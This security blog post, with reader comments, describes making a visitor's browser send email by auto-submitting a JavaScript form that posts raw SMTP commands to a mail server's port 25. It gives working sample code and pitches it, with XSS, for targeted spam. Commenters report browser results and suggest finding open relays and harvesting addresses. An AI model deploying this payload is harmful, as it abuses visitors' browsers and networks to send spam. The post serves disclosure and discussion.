Cenzic 232 Patent
Paid Advertising
web application security lab

JavaScript Spam

Every once in a while I hear something that really gets my imagination going. A few weeks ago when Samy and I were having lunch, he told me about a way to sent email through a browser using a form and an automatic form submission using JavaScript. While not new (there is an old obscure paper about this dating back to 2001), it’s definitely not well known. Especially in the day and age where JavaScript is coming under more scrutiny because of it’s malicious power, this could prove to be a really nasty thing in spammer’s arsenal.

The only obstacle in a spammer’s way is knowing which mail servers will and won’t accept malformed information in this way (thus far it looks like sendmail works, but I haven’t had luck with exchange or qmail). Here’s some sample code:

server='mail.server.com';
document.write('<form name="B" target="A" method="post" action="http://'+server+':25/" enctype="multipart/form-data">');
document.write('<textarea name="C"></textarea></form>');
s = 'HELO test\n';
s += 'EHLO test\n';
s += 'MAIL FROM:<test@hotmail.com>\n';
s += 'RCPT TO:<user@domain.com>\n';
s += 'DATA\n';
s += 'From: test@test.com\n';
s += 'To: test@test.com\n';
s += 'Subject: heh!\n';
s += 'testing 123\n\n';
s += '.\n\nQUIT\n\n';
document.B.C.value=s;
document.B.submit();

Combining XSS, and knowing the user who is visiting the page’s email address can actually create ultra targeted spam sent from that user. Why bother burning through your own IP space if you can get someone else to use theirs? Pretty ugly! Your mileage may vary in the calls themselves. I’d be interested to hear other people’s test results.

9 Responses to “JavaScript Spam”

  1. Wladimir Palant Says:

    Yes, I came across this bug when I looked at port scanning. That was the report that caused Mozilla to close a number of well-known ports in the first place - https://bugzilla.mozilla.org/show_bug.cgi?id=83401 Note that the example there doesn’t even require JavaScript, a simple META Refresh will do.

  2. Sid Says:

    I tried using this against postfix on my localhost and when redirected to 127.0.0.1:25 firefox gave me this:
    http://img363.imageshack.us/img363/9657/nosmtpformebp1.gif

    Opera on the other hand was fine with sending the request (the SMTP server didn’t send any emails though)

    This is a great idea though, if only I knew of a public smtp server that this worked on.

  3. Kyran Says:

    Yeah Sid, I think the hardest part is finding a suitable SMTP server.
    Although, if it’s supertargeted, you could probably use their ISP’s.

  4. Jungsonn Says:

    Haha yes, that’s an oldie. :) it’s nice to see those things revive!

    Results:

    Firefox 2.0: same as Sid.
    Internet Explorer 6.0: Works!

  5. kuza55 Says:

    AFAIK Anti-DNS Pinning still works, right?

    Because as long as that works, it doesn’t really matter if SMTP servers will accept HTTP traffic as if it were SMTP traffic, because we can create sockets.

    But if Anti-DNS Pinning is ever fixed, then this will most definitely become useful again.

  6. anon Says:

    “there is an old obscure paper about this” - Oh, come, come. The paper is “HTML Form Protocol Attack” (http://www.remote.org/jochen/sec/hfpa/hfpa.pdf), it’s not obscure - it’s very plain and focused. It was followed by a very clear CERT warning (http://www.kb.cert.org/vuls/id/476267) as well as a BugTraq BID (http://www.securityfocus.com/bid/3181/discuss).

  7. Another Sid Says:

    One could use form auto-fill to obtain email addresses from many people. http://homer.informatics.indiana.edu/cgi-bin/riddle/riddle.cgi

    Figuring out which relay server to use is harder, but perhaps can be done by looking at the REMOTE_HOST on the server, choosing an appropriate substring, and putting “mail” or “smtp” or “mail-relay” in front. Though this *does* make it harder to use XSS for deployment. One could also choose from a set of known open relays…

    Works in Safari 2.

  8. RSnake Says:

    @kuza55 - yes, that’s correct, anti-DNS pinning is definitely still in our arsenal at this moment.

    @anon - Yup, that’s the one. I’d still contend that it’s obscure since I couldn’t find it linked from anywhere that normally discusses this sort of thing (I think Amit Klein was the first person to show it to me), and it’s definitely old - 6 years is ancient history in this business. I hear people saying things that have been discussed weeks ago are old. But yes, that’s the one.

    @Another Sid - Good info. I hadn’t seen that cgi script before. Cute!

  9. Awesome AnDrEw Says:

    I’ve read somewhere that a lot of domains are unfairly blacklisted as spam outlets because of the ability to use PHP form mailers to mass mail others by appending CC and BCC to the message. I don’t have a lot of information on it though because I don’t set myself up to be raped like that.